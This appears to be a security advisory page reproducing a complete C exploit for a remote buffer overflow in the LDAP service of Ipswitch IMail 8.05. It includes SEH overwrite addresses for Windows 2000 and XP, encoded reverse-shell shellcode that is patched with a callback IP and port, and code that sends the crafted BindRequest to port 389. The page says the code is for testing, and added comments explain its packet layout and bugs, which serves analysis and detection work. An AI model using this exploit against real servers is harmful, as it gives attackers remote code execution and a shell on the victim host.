As we reported in our previous article, Ipswitch IMail LDAP Daemon Remote Buffer Overflow, a vulnerability in Ipswitch's IMail allows remote attackers to overflow an internal buffer, causing it to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by Iván Rodriguez Almuiña.
Exploit:
/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* fuck iDefense */
/* fuck k-otik */
/* fuck private exploits */
/* in other words, fuck you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what :) */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/
#include < stdio.h>
#include < stdlib.h>
#include < string.h>
#include < windows.h>
#include < winsock.h>
#pragma comment (lib,"ws2_32")
// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF
/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
#define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure :)))
/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/
#define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
#define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
#define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure :)))
// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode
/*
 * Open a TCP connection to host:port.
 *
 * host is first tried as a name via gethostbyname(); if that fails it is
 * parsed as a dotted quad with inet_addr().  Progress and error messages
 * are printed to stdout.  Returns the connected descriptor, or 0 on any
 * failure.  Note that the socket() failure test only fires when the call
 * returns 0; Winsock reports failure as INVALID_SOCKET, which this does
 * not catch.
 */
int cnx(char *host, int port)
{
	struct hostent *resolved;
	struct sockaddr_in peer;
	int fd = socket(AF_INET, SOCK_STREAM, 0);

	if (!fd) {
		printf("error: unable to create socket\r\n");
		return 0;
	}

	peer.sin_family = AF_INET;
	peer.sin_addr.s_addr = inet_addr(host);
	peer.sin_port = htons((u_short)port);

	resolved = gethostbyname(host);
	if (resolved != NULL) {
		memcpy((char *)&peer.sin_addr, resolved->h_addr, resolved->h_length);
	} else if ((peer.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
		printf("error: cannot resolve host\r\n");
		return 0;
	}

	printf("[+] Connecting to %-30s ...", host);
	if (connect(fd, (struct sockaddr *)&peer, sizeof peer) != 0) {
		printf("error: connection refused\r\n");
		return 0;
	}
	printf("Done\r\n");
	return fd;
}
/* Print the tool's title lines to stdout. */
void banner(void)
{
	fputs("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n", stdout);
	fputs("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n", stdout);
}
/*
 * Print the usage text for prog (argv[0]) and terminate the process with
 * status 0.  Never returns.
 */
void syntax(char *prog)
{
	static const char *const usage_lines[] = {
		"< version>\t0\t8.05 professional\r\n",
		" \t1\t8.05 express\r\n",
		" \t2\t8.05 evaluation\r\n---\r\n",
		"[OSver] \t0\twindows 2000 universal [default]\r\n",
		" \t1\twindows XP universal\r\n",
	};

	printf("\r\nsyntax: %s < host> < your_ip> < your_port> < version> [OSver]\r\n\r\n", prog);
	for (size_t k = 0; k < sizeof usage_lines / sizeof usage_lines[0]; k++) {
		fputs(usage_lines[k], stdout);
	}
	exit(0);
}
/*
 * Program entry point: assembles the oversized LDAP BindRequest described
 * in the header comment and sends it once to TCP port 389 of argv[1].
 *
 * Arguments (see syntax()): argv[1] target host, argv[2] callback IP,
 * argv[3] callback port, argv[4] <version> (0..2), argv[5] optional
 * [OSver] (0 = Windows 2000, 1 = Windows XP).  Returns 0 once send() has
 * been attempted, -1 on a winsock/connect error.  syntax() never returns
 * (it calls exit(0)), so every "return -1" that follows it is unreachable.
 *
 * NOTE(review): the "< " sequences in this listing ("port< =0",
 * "port< < 16", "#include < stdio.h>") look like an HTML rendering artifact
 * of the published source rather than the author's text.
 */
int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
char buffer[8095]; /* outgoing packet; sizeof(buffer)-1 bytes are sent */
unsigned long host,port; /* XOR-masked callback address / port, patched into shellc0de */
unsigned int i;
/* First 13 bytes of the BindRequest, labelled by the author.  The outer
 * length 0x0a3d (2621) and inner 0x0136 (310) do not match the 8094 bytes
 * that are actually sent, and a 0xff length byte for a one-byte INTEGER is
 * not valid BER — presumably that malformed length is what the vulnerable
 * parser trusts (not confirmed here).  Either mismatch is a usable
 * detection signature for this packet. */
char req1[] =
"\x30\x82" /* bind request */
"\x0a\x3d" /* bind req len */
/* msg id */
"\x02" /* integer */
"\x01" /* length */
"\x01" /* value */
"\x60" /* bind request */
"\x82" /* msg length 2bytes */
"\x01\x36" /* msg length */
/* LDAP ver */
"\x02" /* integer */
"\xff" /* length */
"\x03" /* value */
"\x05\x00" /* DN NULL */
"\x80\x00"; /* Auth simple */
/* Payload bytes exactly as published.  The author labels the first lines
 * as an XOR decoder and the remainder as a connect-back shell; the callback
 * host and port are XORed with 0x95959595 below before being written over
 * the HOP/POP marker dwords.  sizeof(shellc0de)-1 == 333 bytes are copied
 * into the packet. */
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";
banner();
/* Four or five user arguments; syntax() exits the process. */
if(argc< 5||argc>6)
syntax(argv[0]);
/* Callback IP, pre-masked with the payload's XOR key.  The inet_addr()
 * result is not checked, so an unparsable argv[2] is masked and patched
 * in as-is. */
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);
/* <version>: exactly one digit in 0..2.  isdigit() is used without an
 * explicit <ctype.h>; presumably it arrives via <windows.h> — verify. */
if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: < version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target< 0||target>2) {
printf("error: < version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
/* Optional [OSver]: same one-digit rule, 0..1. */
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver< 0||osver>1) {
printf("error: [OSver] must be or 1\r\n");
syntax(argv[0]);
return -1;
}
}
/* port is unsigned long, so "port< =0" only rejects 0; a negative atoi()
 * result wraps and is rejected by the > 65535 test instead. */
if(port< =0||port>65535) {
printf("error: < port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
/* Callback port dword: network-order port in the high 16 bits, 0x0002 in
 * the low 16 bits (the author's layout; 0x0002 presumably stands for the
 * AF_INET family word that precedes sin_port — confirm), then masked with
 * the same key as host. */
port=htons((unsigned short)port);
port=port< < 16;
port+=0x0002;
port=port^0x95959595;
/* Find the HOP and POP marker runs (four identical bytes each) in the
 * payload and overwrite them with the masked host/port; zeroing the
 * variable records that its marker was found.  The i+1..i+3 reads run up
 * to three bytes past the end of shellc0de on the last iterations — an
 * out-of-bounds read of the sender's own stack. */
for(i=0;i< sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}
/* Winsock 1.1; there is no matching WSACleanup() on any path. */
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
/* LDAP port.  cnx() prints its own diagnostics and returns 0 on failure. */
sock=cnx(argv[1],389);
if(!sock)
return -1;
/* <----- magic packet ----->
 * Byte layout as written by the statements below:
 *   [0..12]      req1 BindRequest prefix
 *   [13..7022]   0x90 fill, overwritten at
 *   [13..16]     SEH_ADDR (see the define's comment)
 *   [17..20]     the per-version / per-OS HIJACKED_* address
 *   [21..24]     0x90909013
 *   [200..532]   shellc0de (333 bytes)
 *   [7023..7026] req1[10..13], the DN/auth bytes that close the request
 *   [7027..8093] never written: uninitialised stack goes out on the wire,
 *                so the tail of this packet is nondeterministic. */
strncpy(buffer,req1,13); /* only the 13-byte prefix; no terminator expected */
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
/* Pick the address matching <version> for the chosen OS. */
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // author's note: to avoid 0x00 <unwanted instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1); /* drop the trailing NUL */
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
/* Single send() of 8094 bytes.  On Winsock a failed send() returns
 * SOCKET_ERROR (-1), so the == 0 test below does not detect it. */
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}